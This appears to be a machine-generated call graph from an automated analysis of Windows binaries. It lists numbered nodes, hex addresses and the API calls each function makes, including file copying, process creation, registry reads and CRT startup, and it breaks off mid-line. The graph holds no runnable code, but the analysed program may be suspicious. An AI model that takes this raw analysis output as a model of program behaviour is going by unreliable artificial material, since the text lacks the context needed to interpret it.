110007->110010 110010->110006 110102 6c9dce5d 110103 6c9dce66 110102->110103 110107 6c9dce98 110102->110107 110108 6c9d960e 110103->110108 110109 6c9d9619 110108->110109 110110 6c9d961f 110108->110110 110156 6c9db47b 6 API calls std::_Lockit::_Lockit 110109->110156 110113 6c9d9625 110110->110113 110157 6c9db4ba 6 API calls std::_Lockit::_Lockit 110110->110157 110115 6c9d962a 110113->110115 110163 6c9d4551 45 API calls CallUnexpected 110113->110163 110136 6c9dd21e 110115->110136 110116 6c9d9639 110116->110113 110118 6c9d9666 110116->110118 110119 6c9d9651 110116->110119 110160 6c9db4ba 6 API calls std::_Lockit::_Lockit 110118->110160 110158 6c9db4ba 6 API calls std::_Lockit::_Lockit 110119->110158 110126 6c9d965d 110159 6c9d92c7 HeapFree GetLastError __dosmaperr 110126->110159 110127 6c9d9672 110129 6c9d9685 110127->110129 110130 6c9d9676 110127->110130 110162 6c9d92c7 HeapFree GetLastError __dosmaperr 110129->110162 110161 6c9db4ba 6 API calls std::_Lockit::_Lockit 110130->110161 110137 6c9dd248 110136->110137 110164 6c9dd0aa 110137->110164 110140 6c9dd261 110140->110107 110141 6c9d9301 __fread_nolock 3 API calls 110142 6c9dd272 110141->110142 110143 6c9dd288 110142->110143 110144 6c9dd27a 110142->110144 110172 6c9dcea5 53 API calls 3 library calls 110143->110172 110171 6c9d92c7 HeapFree GetLastError __dosmaperr 110144->110171 110147 6c9dd2b5 110148 6c9dd2c0 110147->110148 110150 6c9dd2db __DllMainCRTStartup@12 110147->110150 110173 6c9d92c7 HeapFree GetLastError __dosmaperr 110148->110173 110149 6c9dd307 110151 6c9dd350 110149->110151 110175 6c9dd5d9 EnterCriticalSection LeaveCriticalSection ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit __DllMainCRTStartup@12 110149->110175 110150->110149 110174 6c9d92c7 HeapFree GetLastError __dosmaperr 110150->110174 110176 6c9d92c7 HeapFree GetLastError __dosmaperr 110151->110176 110156->110110 110157->110116 110158->110126 110159->110113 110160->110127 110161->110126 110162->110115 110165 6c9c49a8 __wsopen_s 45 API calls 110164->110165 110166 6c9dd0bc 110165->110166 110167 6c9dd0dd 110166->110167 110168 6c9dd0cb GetOEMCP 110166->110168 110169 6c9dd0e2 GetACP 110167->110169 110170 6c9dd0f4 110167->110170 110168->110170 110169->110170 110170->110140 110170->110141 110171->110140 110172->110147 110173->110140 110174->110149 110175->110151 110176->110140 110177 6c8554a7 110178 6c8554b2 110177->110178 110190 6c853da0 110178->110190 110181 6c8554dc 110207 6c8549c0 110181->110207 110183 6c8554c5 110183->110181 110186 6c855512 Sleep 110183->110186 110194 6c853f90 110183->110194 110198 6c854c40 110183->110198 110203 6c854db0 110183->110203 110186->110183 110187 6c855552 110211 6c855600 24 API calls 110187->110211 110189 6c85557d 110191 6c853dfe 110190->110191 110212 6c853f20 110191->110212 110195 6c853fa8 110194->110195 110196 6c8549c0 70 API calls 110195->110196 110197 6c85445a 110196->110197 110197->110183 110220 6c9d14d7 110198->110220 110202 6c854c65 110202->110183 110204 6c854ddd 110203->110204 110205 6c853f20 27 API calls 110204->110205 110206 6c855045 110204->110206 110205->110206 110206->110183 110208 6c854a0d 110207->110208 110210 6c854a20 std::ios_base::_Ios_base_dtor 110208->110210 110260 6c859890 70 API calls 2 library calls 110208->110260 110210->110187 110211->110189 110215 6c8559e0 110212->110215 110214 6c853e7f 110214->110183 110216 6c855a57 110215->110216 110218 6c855a36 110215->110218 110219 6c855b10 27 API calls 110216->110219 110218->110214 110219->110218 110221 6c9d14e3 ___scrt_is_nonwritable_in_current_image 110220->110221 110229 6c9d246c EnterCriticalSection 110221->110229 110223 6c9d14ea 110230 6c9d1795 110223->110230 110228 6c9d1527 17 API calls 2 library calls 110228->110202 110229->110223 110231 6c9d17b3 110230->110231 110232 6c9d17c2 110231->110232 110254 6c9dfd76 CreateFileW ___initconin 110231->110254 110247 6c89f507 110232->110247 110234 6c9d17cf 110234->110232 110255 6c9dfde7 5 API calls ___initconin 110234->110255 110237 6c9d14f8 110244 6c9d151e 110237->110244 110238 6c9d17e0 110238->110232 110239 6c9d9301 __fread_nolock 3 API calls 110238->110239 110241 6c9d180d __DllMainCRTStartup@12 110238->110241 110243 6c9d184a 110238->110243 110239->110241 110241->110243 110256 6c9dfe2d 5 API calls ___initconin 110241->110256 110257 6c8c840c HeapFree GetLastError ___std_type_info_destroy_list 110243->110257 110259 6c9d2483 LeaveCriticalSection 110244->110259 110246 6c854c57 110246->110202 110246->110228 110248 6c89f50f 110247->110248 110249 6c89f510 IsProcessorFeaturePresent 110247->110249 110248->110237 110251 6c8f8560 110249->110251 110258 6c8f8646 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110251->110258 110253 6c8f8643 110253->110237 110254->110234 110255->110238 110256->110243 110257->110232 110258->110253 110259->110246 110260->110210 110261 4b1b6f 110262 4b1b7b __FrameHandler3::FrameUnwindToState 110261->110262 110289 4b1648 110262->110289 110264 4b1b82 110265 4b1cd5 110264->110265 110275 4b1bac ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 110264->110275 110395 4b1ed5 4 API calls 2 library calls 110265->110395 110267 4b1cdc 110396 4bb7c8 23 API calls __FrameHandler3::FrameUnwindToState 110267->110396 110269 4b1ce2 110397 4bb78c 23 API calls __FrameHandler3::FrameUnwindToState 110269->110397 110271 4b1cea 110272 4b1bcb 110275->110272 110279 4b1c4c 110275->110279 110391 4baf25 37 API calls 3 library calls 110275->110391 110297 4b1ff0 110279->110297 110290 4b1651 110289->110290 110398 4b20d3 IsProcessorFeaturePresent 110290->110398 110292 4b165d 110399 4b412c 10 API calls 2 library calls 110292->110399 110294 4b1662 110295 4b1666 110294->110295 110400 4b414b 7 API calls 2 library calls 110294->110400 110295->110264 110401 4b30c0 110297->110401 110300 4b1c52 110301 4bc27f 110300->110301 110403 4c639f 110301->110403 110303 4bc288 110304 4b1c5a 110303->110304 110409 4c6644 37 API calls 110303->110409 110306 4a9a30 110304->110306 110412 4a4d40 110306->110412 110308 4a9a59 110309 4a9acc 110308->110309 110311 4a9a6e _Yarn 110308->110311 110437 4a58b0 27 API calls 110308->110437 110433 4a3540 110309->110433 110315 4a9ab7 SetCurrentDirectoryW 110311->110315 110315->110309 110391->110279 110395->110267 110396->110269 110397->110271 110398->110292 110399->110294 110400->110295 110402 4b2003 GetStartupInfoW 110401->110402 110402->110300 110404 4c63a8 110403->110404 110405 4c63da 110403->110405 110410 4be133 37 API calls 3 library calls 110404->110410 110405->110303 110407 4c63cb 110411 4c61eb 47 API calls 4 library calls 110407->110411 110409->110303 110410->110407 110411->110405 110413 4b30c0 __fread_nolock 110412->110413 110414 4a4d75 RegOpenKeyExW 110413->110414 110415 4a4dd7 RegOpenKeyExW 110414->110415 110416 4a4da4 RegQueryValueExW 110414->110416 110419 4a4df9 RegQueryValueExW 110415->110419 110420 4a4e46 110415->110420 110417 4a4dcb RegCloseKey 110416->110417 110418 4a4e20 110416->110418 110417->110415 110422 4a4e9f 110418->110422 110423 4a4e30 110418->110423 110419->110418 110421 4a4e3a RegCloseKey 110419->110421 110438 4a3100 28 API calls 3 library calls 110420->110438 110421->110420 110446 4b1975 5 API calls std::_Locinfo::_Locinfo_dtor 110422->110446 110423->110421 110426 4a4e8e 110439 4b138a 110426->110439 110427 4a4ed6 _Ref_count_obj 110427->110308 110429 4a4e9b 110429->110308 110430 4a4ea4 110430->110427 110447 4b5859 25 API calls 2 library calls 110430->110447 110434 4a3584 110433->110434 110449 4a33e0 27 API calls 110434->110449 110438->110426 110440 4b1393 IsProcessorFeaturePresent 110439->110440 110441 4b1392 110439->110441 110443 4b1890 110440->110443 110441->110429 110448 4b1853 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110443->110448 110445 4b1973 110445->110429 110446->110430 110448->110445 110450 6c87fb0a 110455 6c906d72 110450->110455 110461 6c900ee2 110455->110461 110457 6c87fb14 110458 6c88052b 110457->110458 110468 6c880540 110458->110468 110462 6c900eee __EH_prolog3 110461->110462 110463 6c900f67 110462->110463 110464 6c900f2f GetProfileIntW GetProfileIntW 110462->110464 110467 6c8a33d4 LeaveCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110463->110467 110464->110463 110466 6c900f6e Concurrency::details::ExternalContextBase::~ExternalContextBase 110466->110457 110467->110466 110469 6c88054f 110468->110469 110470 6c880556 110468->110470 110474 6c9cfe38 29 API calls 110469->110474 110475 6c9cfdc7 29 API calls 110470->110475 110473 6c87fb1e 110474->110473 110475->110473 110476 6c864a68 110477 6c864e86 110476->110477 110478 6c857b10 27 API calls 110477->110478 110479 6c864ea5 110478->110479 110480 6c8656c0 27 API calls 110479->110480 110481 6c864ed6 110480->110481 110482 6c858670 24 API calls 110481->110482 110483 6c864f0c 110482->110483 110484 6c858670 24 API calls 110483->110484 110485 6c864f17 110484->110485 110486 6c857b10 27 API calls 110485->110486 110487 6c864f36 110486->110487 110488 6c8656c0 27 API calls 110487->110488 110489 6c864f67 110488->110489 110490 6c858670 24 API calls 110489->110490 110491 6c864f77 110490->110491 110492 6c864f8d CopyFileA 110491->110492 110495 6c864fb5 110492->110495 110493 6c857b10 27 API calls 110494 6c865031 110493->110494 110496 6c8656c0 27 API calls 110494->110496 110495->110493 110497 6c865062 110496->110497 110498 6c858670 24 API calls 110497->110498 110499 6c865072 110498->110499 110500 6c865088 CopyFileA 110499->110500 110505 6c8650b0 110500->110505 110501 6c857b10 27 API calls 110502 6c865179 110501->110502 110503 6c8656c0 27 API calls 110502->110503 110504 6c8651aa 110503->110504 110506 6c8659c0 124 API calls 110504->110506 110505->110501 110507 6c8651e3 110506->110507 110508 6c858670 24 API calls 110507->110508 110509 6c8651f6 110508->110509 110510 6c858670 24 API calls 110509->110510 110511 6c865201 110510->110511 110512 6c86521e 110511->110512 110551 6c865a70 71 API calls 110511->110551 110515 6c865296 CreateProcessA 110512->110515 110516 6c86526c 110512->110516 110514 6c865242 110521 6c865aa0 76 API calls 110514->110521 110518 6c86530e 110515->110518 110519 6c8652ff 110515->110519 110552 6c8648d0 OpenProcess CloseHandle 110516->110552 110520 6c857b10 27 API calls 110518->110520 110524 6c865d80 76 API calls 110519->110524 110523 6c86532a 110520->110523 110521->110512 110522 6c86527a 110522->110515 110544 6c865287 110522->110544 110526 6c8656c0 27 API calls 110523->110526 110525 6c865444 110524->110525 110527 6c858670 24 API calls 110525->110527 110528 6c865358 110526->110528 110529 6c86544f 110527->110529 110532 6c865720 124 API calls 110528->110532 110530 6c858670 24 API calls 110529->110530 110531 6c86545a 110530->110531 110533 6c865d50 76 API calls 110531->110533 110535 6c865391 110532->110535 110534 6c865465 110533->110534 110536 6c858670 24 API calls 110535->110536 110537 6c8653a4 110536->110537 110538 6c858670 24 API calls 110537->110538 110539 6c8653ac 110538->110539 110546 6c8653bf CloseHandle CloseHandle 110539->110546 110547 6c865b10 110539->110547 110542 6c8653e3 110545 6c865850 76 API calls 110542->110545 110543 6c865d50 76 API calls 110543->110544 110544->110519 110545->110546 110546->110543 110548 6c865b5d 110547->110548 110550 6c865b70 std::ios_base::_Ios_base_dtor 110548->110550 110553 6c859890 70 API calls 2 library calls 110548->110553 110550->110542 110551->110514 110552->110522 110553->110550 110554 6c9c2053 110555 6c9c205c 110554->110555 110556 6c9c2061 110554->110556 110571 6c9c2076 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 110555->110571 110560 6c9c1f48 110556->110560 110562 6c9c1f54 ___scrt_is_nonwritable_in_current_image 110560->110562 110561 6c9c1f7d dllmain_raw 110563 6c9c1f97 dllmain_crt_dispatch 110561->110563 110568 6c9c1f63 110561->110568 110562->110561 110567 6c9c1f78 __DllMainCRTStartup@12 110562->110567 110562->110568 110563->110567 110563->110568 110564 6c9c1fe9 110565 6c9c1ff2 dllmain_crt_dispatch 110564->110565 110564->110568 110566 6c9c2005 dllmain_raw 110565->110566 110565->110568 110566->110568 110567->110564 110572 6c9c1e1c 119 API calls 4 library calls 110567->110572 110570 6c9c1fde dllmain_raw 110570->110564 110571->110556 110572->110570 110573 6c9d29d2 110574 6c9d29df 110573->110574 110575 6c9d2a09 110574->110575 110578 6c9d29eb std::bad_exception::bad_exception 110574->110578 110589 6c9d2994 25 API calls ___crtDownlevelLCIDToLocaleName 110574->110589 110579 6c9e06f2 110575->110579 110580 6c9e06ff 110579->110580 110581 6c9e070a 110579->110581 110582 6c9d9301 __fread_nolock 3 API calls 110580->110582 110583 6c9e0712 110581->110583 110587 6c9e071b __fread_nolock 110581->110587 110586 6c9e0707 110582->110586 110590 6c9d92c7 HeapFree GetLastError __dosmaperr 110583->110590 110585 6c9e0745 RtlReAllocateHeap 110585->110586 110585->110587 110586->110578 110587->110585 110587->110586 110591 6c9cf6bb EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110587->110591 110589->110575 110590->110586 110591->110587 110592 6c896e7f 110593 6c896e99 110592->110593 110594 6c896e83 110592->110594 110594->110593 110596 6c8a56dd LeaveCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase ~refcount_ptr __EH_prolog3_catch 110594->110596 110596->110593 110597 6c9dff0b CreateFileW 110598 6c87f9ff 110603 6c89df5b 110598->110603 110600 6c87fa09 110601 6c88052b 29 API calls 110600->110601 110602 6c87fa13 110601->110602 110604 6c89df67 __EH_prolog3 110603->110604 110607 6c89e2b7 110604->110607 110606 6c89e150 Concurrency::details::ExternalContextBase::~ExternalContextBase 110606->110600 110608 6c89e35f 110607->110608 110610 6c89e2d8 std::bad_exception::bad_exception 110607->110610 110609 6c89f507 _ValidateLocalCookies 5 API calls 110608->110609 110611 6c89e372 110609->110611 110612 6c89e308 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 110610->110612 110611->110606 110618 6c89e374 110612->110618 110614 6c89e351 110693 6c89e792 110614->110693 110779 6c89f515 110618->110779 110620 6c89e380 GetSysColor 110621 6c89e395 GetSysColor 110620->110621 110622 6c89e3a1 GetSysColor 110620->110622 110621->110622 110624 6c89e3c4 110622->110624 110625 6c89e3b8 GetSysColor 110622->110625 110780 6c883e38 110624->110780 110625->110624 110627 6c89e3da 22 API calls 110628 6c89e50d GetSysColor 110627->110628 110629 6c89e504 110627->110629 110630 6c89e51f GetSysColorBrush 110628->110630 110629->110630 110631 6c89e53b GetSysColorBrush 110630->110631 110632 6c89e78c 110630->110632 110631->110632 110633 6c89e54e GetSysColorBrush 110631->110633 110819 6c89773a RaiseException Concurrency::cancel_current_task 110632->110819 110633->110632 110635 6c89e561 110633->110635 110788 6c88315a 110635->110788 110638 6c89e56e CreateSolidBrush 110793 6c883104 110638->110793 110641 6c88315a 4 API calls 110642 6c89e58c CreateSolidBrush 110641->110642 110643 6c883104 3 API calls 110642->110643 110644 6c89e59d 110643->110644 110645 6c88315a 4 API calls 110644->110645 110646 6c89e5aa CreateSolidBrush 110645->110646 110647 6c883104 3 API calls 110646->110647 110648 6c89e5bb 110647->110648 110649 6c88315a 4 API calls 110648->110649 110650 6c89e5c8 CreateSolidBrush 110649->110650 110651 6c883104 3 API calls 110650->110651 110652 6c89e5dc 110651->110652 110653 6c88315a 4 API calls 110652->110653 110654 6c89e5e9 CreateSolidBrush 110653->110654 110655 6c883104 3 API calls 110654->110655 110656 6c89e5fa 110655->110656 110657 6c88315a 4 API calls 110656->110657 110658 6c89e607 CreateSolidBrush 110657->110658 110659 6c883104 3 API calls 110658->110659 110660 6c89e618 110659->110660 110661 6c88315a 4 API calls 110660->110661 110662 6c89e625 CreateSolidBrush 110661->110662 110663 6c883104 3 API calls 110662->110663 110664 6c89e636 110663->110664 110665 6c88315a 4 API calls 110664->110665 110666 6c89e643 CreatePen 110665->110666 110667 6c883104 3 API calls 110666->110667 110668 6c89e65c 110667->110668 110669 6c88315a 4 API calls 110668->110669 110670 6c89e669 CreatePen 110669->110670 110671 6c883104 3 API calls 110670->110671 110672 6c89e680 110671->110672 110673 6c88315a 4 API calls 110672->110673 110674 6c89e68d CreatePen 110673->110674 110675 6c883104 3 API calls 110674->110675 110676 6c89e6a4 110675->110676 110677 6c89e6bb 110676->110677 110679 6c88315a 4 API calls 110676->110679 110678 6c89e6c4 CreateSolidBrush 110677->110678 110681 6c89e728 110677->110681 110680 6c883104 3 API calls 110678->110680 110679->110677 110682 6c89e726 110680->110682 110681->110632 110683 6c89e736 110681->110683 110799 6c8d1eb9 110682->110799 110685 6c883104 3 API calls 110683->110685 110687 6c89e74f CreatePatternBrush 110685->110687 110688 6c883104 3 API calls 110687->110688 110690 6c89e760 110688->110690 110816 6c87d520 110690->110816 110691 6c89e786 Concurrency::details::ExternalContextBase::~ExternalContextBase 110691->110614 110694 6c89e7a1 __EH_prolog3_GS 110693->110694 110695 6c883e38 4 API calls 110694->110695 110696 6c89e7b0 GetDeviceCaps 110695->110696 110698 6c89e7ea 110696->110698 110697 6c89e81e 110699 6c89e83c 110697->110699 110704 6c883130 3 API calls 110697->110704 110698->110697 110700 6c883130 3 API calls 110698->110700 110701 6c89e85a 110699->110701 110705 6c883130 3 API calls 110699->110705 110703 6c89e817 DeleteObject 110700->110703 110702 6c89e878 110701->110702 110709 6c883130 3 API calls 110701->110709 110706 6c89e896 110702->110706 110713 6c883130 3 API calls 110702->110713 110703->110697 110707 6c89e835 DeleteObject 110704->110707 110708 6c89e853 DeleteObject 110705->110708 110710 6c89e8b4 110706->110710 110714 6c883130 3 API calls 110706->110714 110707->110699 110708->110701 110712 6c89e871 DeleteObject 110709->110712 110711 6c89e8d2 110710->110711 110718 6c883130 3 API calls 110710->110718 110715 6c89e8f0 110711->110715 110722 6c883130 3 API calls 110711->110722 110712->110702 110716 6c89e88f DeleteObject 110713->110716 110717 6c89e8ad DeleteObject 110714->110717 110719 6c89e90e 110715->110719 110725 6c883130 3 API calls 110715->110725 110716->110706 110717->110710 110721 6c89e8cb DeleteObject 110718->110721 110720 6c89e92c 110719->110720 110727 6c883130 3 API calls 110719->110727 110845 6c89f243 110720->110845 110721->110711 110724 6c89e8e9 DeleteObject 110722->110724 110724->110715 110726 6c89e907 DeleteObject 110725->110726 110726->110719 110729 6c89e925 DeleteObject 110727->110729 110728 6c89e944 std::bad_exception::bad_exception 110730 6c89e951 GetTextCharsetInfo 110728->110730 110729->110720 110731 6c89e98b lstrcpyW 110730->110731 110733 6c89ea2b CreateFontIndirectW 110731->110733 110734 6c89e9bf 110731->110734 110736 6c883104 3 API calls 110733->110736 110734->110733 110735 6c89e9c8 EnumFontFamiliesW 110734->110735 110737 6c89e9f9 EnumFontFamiliesW 110735->110737 110738 6c89e9e4 lstrcpyW 110735->110738 110741 6c89ea3d 110736->110741 110739 6c89ea18 lstrcpyW 110737->110739 110738->110733 110739->110733 110742 6c89ea73 CreateFontIndirectW 110741->110742 110743 6c883104 3 API calls 110742->110743 110744 6c89ea85 110743->110744 110745 6c89f243 SystemParametersInfoW 110744->110745 110746 6c89eaa0 CreateFontIndirectW 110745->110746 110747 6c883104 3 API calls 110746->110747 110748 6c89eac8 CreateFontIndirectW 110747->110748 110749 6c883104 3 API calls 110748->110749 110750 6c89eaf4 CreateFontIndirectW 110749->110750 110751 6c883104 3 API calls 110750->110751 110752 6c89eb15 GetSystemMetrics lstrcpyW CreateFontIndirectW 110751->110752 110753 6c883104 3 API calls 110752->110753 110754 6c89eb51 GetStockObject 110753->110754 110755 6c89ec49 110754->110755 110756 6c89eb7f GetObjectW 110754->110756 110848 6c89f284 110755->110848 110756->110755 110758 6c89eb94 lstrcpyW CreateFontIndirectW 110756->110758 110759 6c883104 3 API calls 110758->110759 110760 6c89ebe3 CreateFontIndirectW 110759->110760 110761 6c883104 3 API calls 110760->110761 110765 6c89ebfc GetObjectW CreateFontIndirectW 110761->110765 110770 6c883104 3 API calls 110765->110770 110771 6c89ec28 CreateFontIndirectW 110770->110771 110774 6c883104 3 API calls 110771->110774 110774->110755 110779->110620 110781 6c883e44 __EH_prolog3 110780->110781 110782 6c883e67 GetWindowDC 110781->110782 110820 6c8832e6 110782->110820 110785 6c883e7d Concurrency::details::ExternalContextBase::~ExternalContextBase 110785->110627 110789 6c883160 110788->110789 110790 6c883163 110788->110790 110789->110638 110829 6c883130 110790->110829 110792 6c883168 DeleteObject 110792->110638 110794 6c883111 110793->110794 110798 6c883126 110793->110798 110834 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110794->110834 110796 6c88311b 110835 6c8a0522 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110796->110835 110798->110641 110800 6c8d1ec2 110799->110800 110810 6c89e774 110799->110810 110800->110810 110836 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110800->110836 110802 6c8d1ed5 110837 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110802->110837 110804 6c8d1edf 110838 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110804->110838 110806 6c8d1ee9 110839 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110806->110839 110808 6c8d1ef3 110840 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110808->110840 110811 6c883e8d 110810->110811 110812 6c883328 110811->110812 110813 6c883ebd ReleaseDC 110812->110813 110841 6c883bda 110813->110841 110817 6c88315a 4 API calls 110816->110817 110818 6c87d570 110817->110818 110818->110682 110821 6c8832f3 110820->110821 110825 6c883309 110820->110825 110827 6c883f8f RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110821->110827 110823 6c8832fe 110828 6c8a0522 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110823->110828 110825->110785 110826 6c882a8b RaiseException Concurrency::cancel_current_task 110825->110826 110827->110823 110828->110825 110830 6c88313b 110829->110830 110831 6c883142 110829->110831 110833 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110830->110833 110831->110792 110833->110831 110834->110796 110835->110798 110836->110802 110837->110804 110838->110806 110839->110808 110840->110810 110842 6c883c14 110841->110842 110843 6c883c08 110841->110843 110842->110691 110844 6c883c0d DeleteDC 110843->110844 110844->110842 110846 6c89f258 SystemParametersInfoW 110845->110846 110847 6c89f252 110845->110847 110846->110728 110847->110846 110849 6c89f290 __EH_prolog3_GS 110848->110849 110850 6c883e38 4 API calls 110849->110850 110851 6c89f29c 110850->110851 110871 6c883483 110851->110871 110872 6c8834a9 110871->110872 110873 6c88349a SelectObject 110871->110873 110875 6c8834bf 110872->110875 110876 6c8834b5 SelectObject 110872->110876 110873->110872 110880 6c8830f2 110875->110880 110876->110875 110883 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110880->110883 110882 6c8830fc 110883->110882 110884 42811f2 110885 42811fd 110884->110885 110886 4281202 110884->110886 110902 4288262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 110885->110902 110890 42810fc 110886->110890 110889 4281210 110892 4281108 _doexit 110890->110892 110891 4281155 110900 42811a5 _doexit 110891->110900 110954 427e480 110891->110954 110892->110891 110892->110900 110903 4280f98 110892->110903 110896 4281185 110898 4280f98 __CRT_INIT@12 149 API calls 110896->110898 110896->110900 110897 427e480 ___DllMainCRTStartup 521 API calls 110899 428117c 110897->110899 110898->110900 110901 4280f98 __CRT_INIT@12 149 API calls 110899->110901 110900->110889 110901->110896 110902->110886 110904 4280fa4 _doexit 110903->110904 110905 4280fac 110904->110905 110906 4281026 110904->110906 110958 4281a1b HeapCreate 110905->110958 110908 4281087 110906->110908 110914 428102c 110906->110914 110909 428108c 110908->110909 110910 42810e5 110908->110910 110988 4283ca0 TlsGetValue 110909->110988 110915 4280fb5 _doexit 110910->110915 111016 4283fa6 79 API calls __freefls@4 110910->111016 110912 4280fb1 110912->110915 110977 4284014 86 API calls 4 library calls 110912->110977 110913 428104a 110920 428105e 110913->110920 110984 4287dfb 67 API calls _free 110913->110984 110914->110913 110914->110915 110983 4281ce6 66 API calls _doexit 110914->110983 110915->110891 110987 4281071 70 API calls __mtterm 110920->110987 110923 4280fc1 __RTC_Initialize 110926 4280fc5 110923->110926 110933 4280fd1 GetCommandLineA 110923->110933 110978 4281a39 HeapDestroy 110926->110978 110927 4281054 110985 4283cf1 70 API calls _free 110927->110985 110928 42810a9 DecodePointer 110934 42810be 110928->110934 110931 4280fca 110931->110915 110932 4281059 110986 4281a39 HeapDestroy 110932->110986 110959 428817f 71 API calls 2 library calls 110933->110959 110938 42810d9 110934->110938 110939 42810c2 110934->110939 110937 4280fe1 110960 4287bb6 73 API calls __calloc_crt 110937->110960 111010 427f639 110938->111010 110997 4283d2e 110939->110997 110943 4280feb 110945 4280fef 110943->110945 110980 42880c4 95 API calls 3 library calls 110943->110980 110944 42810c9 GetCurrentThreadId 110944->110915 110979 4283cf1 70 API calls _free 110945->110979 110948 4280ffb 110949 428100f 110948->110949 110961 4287e4e 110948->110961 110949->110931 110982 4287dfb 67 API calls _free 110949->110982 110955 427e4af 110954->110955 110956 427e489 110954->110956 110955->110896 110955->110897 110956->110955 110957 427e491 CreateThread WaitForSingleObject 110956->110957 110957->110955 111079 427df10 110957->111079 110958->110912 110959->110937 110960->110943 110962 4287e57 110961->110962 110965 4287e5c _strlen 110961->110965 111017 4284d28 94 API calls __setmbcp 110962->111017 110964 4284534 __calloc_crt 66 API calls 110971 4287e91 _strlen 110964->110971 110965->110964 110968 4281004 110965->110968 110966 4287ee0 110967 427f639 _free 66 API calls 110966->110967 110967->110968 110968->110949 110981 4281af9 77 API calls 4 library calls 110968->110981 110969 4284534 __calloc_crt 66 API calls 110969->110971 110970 4287f06 110972 427f639 _free 66 API calls 110970->110972 110971->110966 110971->110968 110971->110969 110971->110970 110974 4287f1d 110971->110974 111018 4281928 66 API calls 2 library calls 110971->111018 110972->110968 111019 4282090 110974->111019 110976 4287f29 110977->110923 110978->110931 110979->110926 110980->110948 110981->110949 110982->110945 110983->110913 110984->110927 110985->110932 110986->110920 110987->110915 110989 4281091 110988->110989 110990 4283cb5 DecodePointer TlsSetValue 110988->110990 110991 4284534 110989->110991 110990->110989 110994 428453d 110991->110994 110993 428109d 110993->110915 110993->110928 110994->110993 110995 428455b Sleep 110994->110995 111037 428a6f2 110994->111037 110996 4284570 110995->110996 110996->110993 110996->110994 111048 4284300 110997->111048 110999 4283d3a GetModuleHandleW 111049 4288e5b 110999->111049 111001 4283d78 InterlockedIncrement 111056 4283dd0 111001->111056 111004 4288e5b __lock 64 API calls 111005 4283d99 111004->111005 111059 4284d46 InterlockedIncrement 111005->111059 111007 4283db7 111071 4283dd9 111007->111071 111009 4283dc4 _doexit 111009->110944 111011 427f644 RtlFreeHeap 111010->111011 111015 427f66d _free 111010->111015 111012 427f659 111011->111012 111011->111015 111078 427f91b 66 API calls __getptd_noexit 111012->111078 111014 427f65f GetLastError 111014->111015 111015->110915 111016->110915 111017->110965 111018->110971 111022 4281f67 111019->111022 111023 4281f86 _memset __call_reportfault 111022->111023 111024 4281fa4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 111023->111024 111025 4282072 __call_reportfault 111024->111025 111028 427f00a 111025->111028 111027 428208e GetCurrentProcess TerminateProcess 111027->110976 111029 427f014 IsDebuggerPresent 111028->111029 111030 427f012 111028->111030 111036 42882fd 111029->111036 111030->111027 111033 428132e SetUnhandledExceptionFilter UnhandledExceptionFilter 111034 428134b __call_reportfault 111033->111034 111035 4281353 GetCurrentProcess TerminateProcess 111033->111035 111034->111035 111035->111027 111036->111033 111038 428a6fe 111037->111038 111044 428a719 111037->111044 111039 428a70a 111038->111039 111038->111044 111046 427f91b 66 API calls __getptd_noexit 111039->111046 111041 428a72c RtlAllocateHeap 111043 428a753 111041->111043 111041->111044 111042 428a70f 111042->110994 111043->110994 111044->111041 111044->111043 111047 4281f30 DecodePointer 111044->111047 111046->111042 111047->111044 111048->110999 111050 4288e70 111049->111050 111051 4288e83 EnterCriticalSection 111049->111051 111074 4288d99 66 API calls 8 library calls 111050->111074 111051->111001 111053 4288e76 111053->111051 111075 4281cf5 66 API calls 3 library calls 111053->111075 111076 4288d82 LeaveCriticalSection 111056->111076 111058 4283d92 111058->111004 111060 4284d64 InterlockedIncrement 111059->111060 111061 4284d67 111059->111061 111060->111061 111062 4284d71 InterlockedIncrement 111061->111062 111063 4284d74 111061->111063 111062->111063 111064 4284d7e InterlockedIncrement 111063->111064 111065 4284d81 111063->111065 111064->111065 111066 4284d8b InterlockedIncrement 111065->111066 111068 4284d8e 111065->111068 111066->111068 111067 4284da7 InterlockedIncrement 111067->111068 111068->111067 111069 4284db7 InterlockedIncrement 111068->111069 111070 4284dc2 InterlockedIncrement 111068->111070 111069->111068 111070->111007 111077 4288d82 LeaveCriticalSection 111071->111077 111073 4283de0 111073->111009 111074->111053 111076->111058 111077->111073 111078->111014 111123 4280542 111079->111123 111082 427df97 111085 427dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 111082->111085 111086 427df9f 111082->111086 111083 427df74 111084 427f707 77 API calls 111083->111084 111087 